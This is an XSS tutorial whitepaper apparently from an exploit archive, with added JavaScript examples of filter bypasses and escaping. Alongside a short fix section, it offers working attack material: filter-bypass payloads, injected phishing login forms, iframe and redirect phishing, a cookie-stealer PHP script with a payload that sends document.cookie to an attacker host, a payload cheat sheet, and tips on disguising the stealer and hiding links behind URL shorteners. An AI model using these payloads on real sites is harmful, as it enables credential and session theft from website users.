
28/03/2016

Vulnerability Analysis, Security Papers, Exploit Tutorials - Part 13646

<|[___________________________________________________________________________]|>

[Advanced XSS Knowledge]

written by novaca!ne

<|[___________________________________________________________________________]|>
# Author: novaca!ne
# Date: 23.03.2010

.................
Contact: [email protected]
Website: www.novacaine.biz.

Artwork by: Vincenzo.

Greetz fly out to:

Vincenzo, J0hn.X3r, fred777,
h0yt3r, EasyLaster, td0s,
Lorenz, Montaxx, maoshe, Palme
and freehack.com
.................
....................
Index:
(I]> Introduction.
(II]> What exactly is XSS?.
(III]> How to execute XSS commands.
(IV]> Bypass techniques.
(V]> What can we do with XSS?.
(VI]> How to fix XSS leakages.
(VII]> Cheat Sheets.
...................

https://www.exploit-db.com/papers/13646/

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(I]> Introduction
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Dear reader, I wrote this whitepaper to sum up everything I know about XSS.
$ It was written to share knowledge; knowledge should be free and available
$ for everyone.
$ You can post and copy this whitepaper as much as you want, but respect the
$ author's copyrights.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(II]> What exactly is XSS?
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ "XSS" is short for "Cross Site Scripting". As you can see by the name, XSS
$ deals with scripting. To be more exact: JavaScript.
$ It's about injecting (almost) any JavaScript (and HTML/CSS)
$ command/script into a website.
$ XSS flaws come up every time a website puts the attacker's input into a page
$ without filtering or encoding it.
$ In other words:
$ the attacker can inject his malicious script into a website, and the browser
$ just runs the code or script, with the same rights as the site's own scripts.
$ There are 3 types of XSS; I'm going to talk about the 2 most used:
$ Reflected XSS attack:
$ When an attacker injects his malicious script into a search query,
$ a search box, or the end of a URL, and the server echoes it straight back in
$ its response, it's called a reflected XSS attack. It's like throwing a ball
$ against a wall and getting it back. The victim has to open the crafted URL.
$ Stored XSS attack:
$ Is when an injected XSS script is stored permanently on a website,
$ for example in a guestbook or bulletin board. Stored XSS hits everyone who
$ just reaches the page with the malicious code.
$ DOM based XSS:
$ Here the injection happens in the browser itself: the site's own JavaScript
$ reads attacker-controlled data (e.g. part of the URL) and writes it into the
$ page. This is a less used method; perhaps I'm going to write another
$ whitepaper about DOM based XSS attacks.

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(III]> How to execute XSS commands
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Actually, injecting an XSS script is very easy. To check whether the target
$ website is vulnerable, just look out for a search box or something similar.
$ Let's say this is how a simple, unsecured search function looks:
content of index.html
<html>
<head>
<title>Google</title>
</head>
<body>

<form method="get" action="google.php">
Google:
<input type="text" name="search" size="20" />
<input type="submit" class="button" value="Submit" />
</form>

</body>
</html>
content of google.php
<?php echo $_GET['search']; ?>
# I'm going to use this script as an example for the rest of this paper #
$ The script echoes the search parameter back unchanged, so whatever the
$ browser sends is put straight into the HTML page.
$ Let's say this script is stored on a web space. When I type in:
$ 123
$ then it leads me to the URL:
http://site.ru/google.php?search=123
$ and shows me
123
$ But now, let's try to inject a simple JavaScript alert message:
<script>alert("turtles");</script>
$ and send it.
$ You can replace "turtles" with any other word you want, and even use ''
$ instead of "", for example:
<script>alert('1234');</script>
$ But I'll keep using "turtles" as the example for the rest of this paper.
$ The target website lets us know it's vulnerable when it shows a popup
$ containing
$ |=========|    |======|
$ | turtles | or | 1234 |
$ |=========|    |======|
$ Instead of the alert code, we can also inject plain HTML tags, e.g.:
<h1><font color="#00FF00">I like turtles</font></h1>
$ and send it.
$ Also, you can paste the code at the end of the URL and visit the site like:
www.site.ru/google.php?search=<script>alert('turtles');</script>
$ or
www.site.ru/google.php?search=<h1><font color="#00FF00">I like turtles</font></h1>
# It's like the attacker is determining the content of the website. #
$ But even if this doesn't work, there's no reason to worry: that means the
$ website uses filter techniques to avoid XSS flaws. But there are also ways to
$ bypass those filters. How this works, you're going to read in the next chapter.
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(IV]> Bypass techniques
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ There are a lot of ways to bypass XSS filters on websites; I'll list some:
$ 1.) magic_quotes_gpc = ON bypass
$ 2.) HEX encoding
$ 3.) Obfuscation
$ 4.) Trying around
$ 1.) magic_quotes_gpc = ON is a PHP setting (php.ini).
$ It causes every ' (single quote), " (double quote) and \ (backslash) in the
$ request data to be escaped with a backslash automatically. It's also a well
$ known method to avoid XSS flaws, although it's exploitable: it only touches
$ those three characters, so a payload that doesn't need quotes goes through
$ untouched. (The setting was deprecated in PHP 5.3 and removed in PHP 5.4.)

$ How to bypass it when it's ON? Use the JavaScript function called
$ String.fromCharCode(): just convert your text into decimal character codes
$ (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the call.
$ Using turtles (without quote signs) will look like this:

String.fromCharCode(116,117,114,116,108,101,115)

$ Now insert this in your alert script:
www.site.ru/google.php?search=<script>alert(String.fromCharCode(116,117,114,116,108,101,115));</script>
$ 2.) HEX encoding is a useful bypass method, too. This step URL-encodes every
$ character of your script as %XX, so you can't see clearly at first glance
$ what the code will do. The web server decodes it again before google.php
$ echoes it, so the browser still gets the plain script; the encoding only
$ hides the payload from someone reading the URL and from filters that look at
$ the raw query string.
$ This is how
<script>alert(/turtles/);</script>
$ looks encoded in HEX:
www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%

$ 3.) Obfuscation: sometimes website administrators simply put words like
$ "script", "alert()", "''" on the "bad words list", which means that when you
$ search for "script" on the website, it just shows you an error like
$ "you are not allowed to search for this word" or something similar.
$ But this is weak protection; you can bypass it by obfuscating
$ your JavaScript code, like:
<sCrIpT>alert('turtles');</ScRiPt>
$ HTML tag names are case-insensitive, so the browser still runs this, while a
$ case-sensitive "bad words" check never sees the word "script".
$ There are nearly unlimited possibilities, but that leads us to the
$ next chapter...
$ 4.) Trying around: sometimes you just have to try around, because every
$ website is secured/unsecured in a different, unique way. Some don't even use
$ cookies, for example. Always keep a look at the website's source code!
$ Sometimes you need to adjust your XSS script, like:
"><script>alert(/turtles/);</script>
$ You need this sometimes if you injected your code into a search box, e.g.,
$ and it lands inside an HTML tag (such as the value="" of the search field),
$ so you first need to close that tag, then start a new tag (<script>...).
$ Anyway, there are lots of different methods to bypass XSS filtration,
$ try around!
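The four bypasses above, as an added example that is not code from the paper: the encodings are built programmatically in Node.js, next to a model of what magic_quotes_gpc (PHP's addslashes behaviour) and a "bad words list" filter do to each payload. The filter word list, the payload strings and the helper names are assumptions of this example.

```javascript
// Added example (not code from the original paper): the encodings from chapter IV
// built programmatically, next to a model of what magic_quotes_gpc and a naive
// "bad words" filter do to them.  Every payload string here is constructed.

// 1.) quote-free payload: spell the string with String.fromCharCode so that
//     magic_quotes_gpc, which only escapes ' " and \, has nothing to escape
function toFromCharCode(text) {
  const codes = Array.from(text, ch => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(',')})`;
}

// what magic_quotes_gpc = On did to request data (same as PHP's addslashes)
function magicQuotes(input) {
  return input.replace(/[\\'"]/g, m => '\\' + m);
}

// 2.) percent ("HEX") encoding of every byte of the payload
function percentEncodeAll(text) {
  return Array.from(Buffer.from(text, 'utf8'),
    b => '%' + b.toString(16).toUpperCase().padStart(2, '0')).join('');
}

// what google.php receives: the web server has already decoded the query string
function serverDecode(query) {
  return decodeURIComponent(query);
}

// 3.) obfuscation: alternate the case of the letters; tag names are
//     case-insensitive in HTML, so <sCrIpT> still runs
function mixCase(text) {
  let n = 0;
  return Array.from(text, ch =>
    /[a-z]/i.test(ch) ? (n++ % 2 === 0 ? ch.toLowerCase() : ch.toUpperCase()) : ch
  ).join('');
}

// a "bad words list" check as the chapter describes it (assumed word list),
// and the corrected, case-insensitive version
const BAD_WORDS = ['script', 'alert()'];
function naiveFilterBlocks(input) {
  return BAD_WORDS.some(bad => input.includes(bad));
}
function caseInsensitiveFilterBlocks(input) {
  const lower = input.toLowerCase();
  return BAD_WORDS.some(bad => lower.includes(bad));
}

// the paper's payloads, assembled from the helpers above
const PLAIN = "<script>alert('turtles');</script>";
const QUOTE_FREE = `<script>alert(${toFromCharCode('turtles')});</script>`;
const MIXED = `${mixCase('<script>')}alert('turtles');${mixCase('</script>')}`;
```

magicQuotes() turns PLAIN into `<script>alert(\'turtles\');</script>`, which is a JavaScript syntax error, while QUOTE_FREE comes back unchanged; percentEncodeAll() reproduces the %XX string from the chapter and serverDecode() shows that the server hands google.php the original tag again; MIXED passes naiveFilterBlocks() but not caseInsensitiveFilterBlocks().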

<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(V]> What can we do with XSS?
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Till now I showed you how to spawn a JavaScript alert message on a website.
$ But now I'll show you how harmful such an XSS flaw can be for your website.
$ Here are some attack techniques you can carry out with an XSS flaw:
$ 1.) Inject a phishing script
$ 2.) Iframe phishing
$ 3.) Redirect phishing
$ 4.) Cookie stealing
$ 1.) Phishing script injection: just inject a 'user' and 'password' field in
$ HTML (with the <html> and <body> tags), so that the victim may think he needs
$ to log in to the target site.
$ Here's an example:
www.site.ru/google.php?search=<html><body><head><meta content="text/html;charset=utf-8"></meta></head>
<div style="text-align:center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishing page:<br/><br/>Username:<br/><input name="User"/><br/>Password:<br/>
<input name="Password" type="password"/><br/><br/><input name="Valid" value="Ok!" type="submit"/>
<br/></form></div></body></html>
content of phishingscript.php
<?php
// the keys must match the form field names exactly: PHP array keys are
// case-sensitive, so $_POST['user'] would stay empty for a field named "User"
$login = $_POST['User'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username: ' . $login . '<br>' . 'Password: ' . $password . '<br>' . '<br>');
fclose($open);
?>
$ 2.) Iframe phishing: simple thing, just inject HTML containing an
$ iframe in which your phishing site is embedded.
$ Obviously it needs to look just like the target site.
$ Here's an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
$ (Note: height="100%" width="100%" means that the whole window is filled with
$ that iframe.)
$ The target site will show your phishing site in an iframe, and the website's
$ users/victims won't see a difference and log in (if they're foolish enough).
$ 3.) Redirection phishing: also simple, just inject a JavaScript redirection
$ script that leads to your phishing site; of course it needs to look just
$ like the target site.
$ Here's an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
$ or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.yourphishingsite.ru">
$ 4.) Cookie stealing: one of the feared things about XSS flaws is the cookie
$ stealing attack. In this method you need to do the following:
$ Place this cookiestealer.php on your host, and then inject JavaScript that
$ calls your cookie stealer script into the target website.

content of cookiestealer.php (found it somewhere with Google)
<?php
// $_GET replaces the old $HTTP_GET_VARS array, which was removed in PHP 5.4
$cookie = $_GET["cookie"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);
?>
$ Save it as cookiestealer.php and create a 'log.txt', and upload both files
$ to your own web space, in the same directory, and set "chmod 777".
$ Inject the following code into your target website:
http://www.site.ru/google.php?search=<script>location.href='http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
$ Then the victim's cookie (of the target website's user who visited the
$ URL above) should appear in the log.txt.
$ Now you simply need to insert the cookie (with, e.g., the Live HTTP Headers
$ Firefox add-on) and use it.
$ Obviously you need to replace
http://www.yourphishingsite.ru
$ with the URL of your phishing site.
$ Note that document.cookie only returns cookies that were set without the
$ HttpOnly flag; a session cookie marked HttpOnly can't be read this way.
# PRO TIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
# this looks less suspicious.                                               #
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(VI]> How to fix XSS leakages
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ XSS flaws can be very dangerous for your website, even though you can easily
$ secure your own website using the following functions.
##########################################################
#                                                        #
# htmlspecialchars()                                     #
# http://php.net/manual/de/function.htmlspecialchars.php #
#                                                        #
##########################################################
Example usage:
google.php:
<?php echo htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8'); ?>
$ (Pass ENT_QUOTES: without it, PHP versions before 8.1 leave the single quote
$ untouched, which is enough to break out of a single-quoted attribute.)
$ OR
##########################################################
#                                                        #
# htmlentities()                                         #
# http://php.net/manual/de/function.htmlentities.php     #
#                                                        #
##########################################################
Example usage:
google.php:
<?php echo htmlentities($_GET['search'], ENT_QUOTES, 'UTF-8'); ?>
$ What happened? The function simply replaced every special character with a
$ harmless HTML entity.
$ For example when I enter
<script>alert("turtles");</script>
$ the page source contains
&lt;script&gt;alert(&quot;turtles&quot;);&lt;/script&gt;
$ and the browser displays it as plain text, without any popup, because <, >, ', "
$ turned into &lt;, &gt;, &#039;, &quot;.
$ The attacker's input has become harmless, unexecutable HTML code.
$ This is the right encoding when the value lands in the HTML body or inside a
$ quoted attribute. If it lands inside a <script> block, an unquoted attribute
$ or a URL, that context needs its own encoding; an unquoted attribute can be
$ broken out of without any of those four characters at all.
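The vulnerability check from chapter III and the fix from chapter VI, modelled in JavaScript as an added example (not code from the paper) so the escaping rules can be checked without a PHP host. The two escape functions model PHP's htmlspecialchars() without flags as it behaved before PHP 8.1 and with ENT_QUOTES; the page templates, the attribute reflection and the probe payloads are assumptions of the example.

```javascript
// Added example, not from the original paper: google.php's reflection and the
// htmlspecialchars() fix modelled in JavaScript.  Templates are constructed.

// htmlspecialchars() as PHP ran it before 8.1 without flags: ' is left alone
function htmlspecialcharsCompat(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// htmlspecialchars($s, ENT_QUOTES, 'UTF-8'): also encodes the single quote
function htmlspecialcharsQuotes(s) {
  return htmlspecialcharsCompat(s).replace(/'/g, '&#039;');
}

// google.php as the paper shows it: the parameter goes straight into the page
function renderVulnerable(search) {
  return `<html><body>${search}</body></html>`;
}

// the fixed google.php: the parameter lands in the HTML body, encoded
function renderFixed(search) {
  return `<html><body>${htmlspecialcharsQuotes(search)}</body></html>`;
}

// the same value reflected inside an attribute (a search box that repeats the
// query, an assumed template); the quote character used by the attribute, if
// any, decides whether the escaping is sufficient
function renderAttr(search, escape, quote) {
  return `<input type="text" name="search" value=${quote}${escape(search)}${quote}>`;
}

// the probe from chapter III: does the marker come back as live markup?
function reflectsRawTag(page, tag = '<script>') {
  return page.includes(tag);
}
```

renderVulnerable() reflects the probe as a live `<script>` tag and renderFixed() does not; the attribute case shows that the flag-less escape still lets `' onmouseover='alert(1)` close a single-quoted value, and that an unquoted attribute is escaped from with plain letters and spaces, so quoting the attribute matters as much as the encoding.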
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
|(VII]> Cheat Sheets
<~.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.~>
$ Here is the XSS cheat sheet; I got most of them from
http://ha.ckers.org/xss.html.
$ Enjoy.
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
$ The three long lines are javascript:alert('XSS') written as decimal,
$ zero-padded decimal and hex HTML entities; the last four split "javascript"
$ with a literal tab, an encoded tab, an encoded line feed and an encoded
$ carriage return (entity forms as in the cheat sheet linked above).
$ Note that javascript: URLs in IMG SRC only run in old browsers (such as
$ Internet Explorer 6); current browsers ignore them.
#############################################################
#                                                           #
# PRO TIP FOR EVERY XSS INJECTION:                          #
# use URL shortener services such as tinyurl.com or bit.ly  #
# to 'hide' your injection, so the victim won't know what's #
# behind that URL.                                          #
#                                                           #
#############################################################
END OF FILE
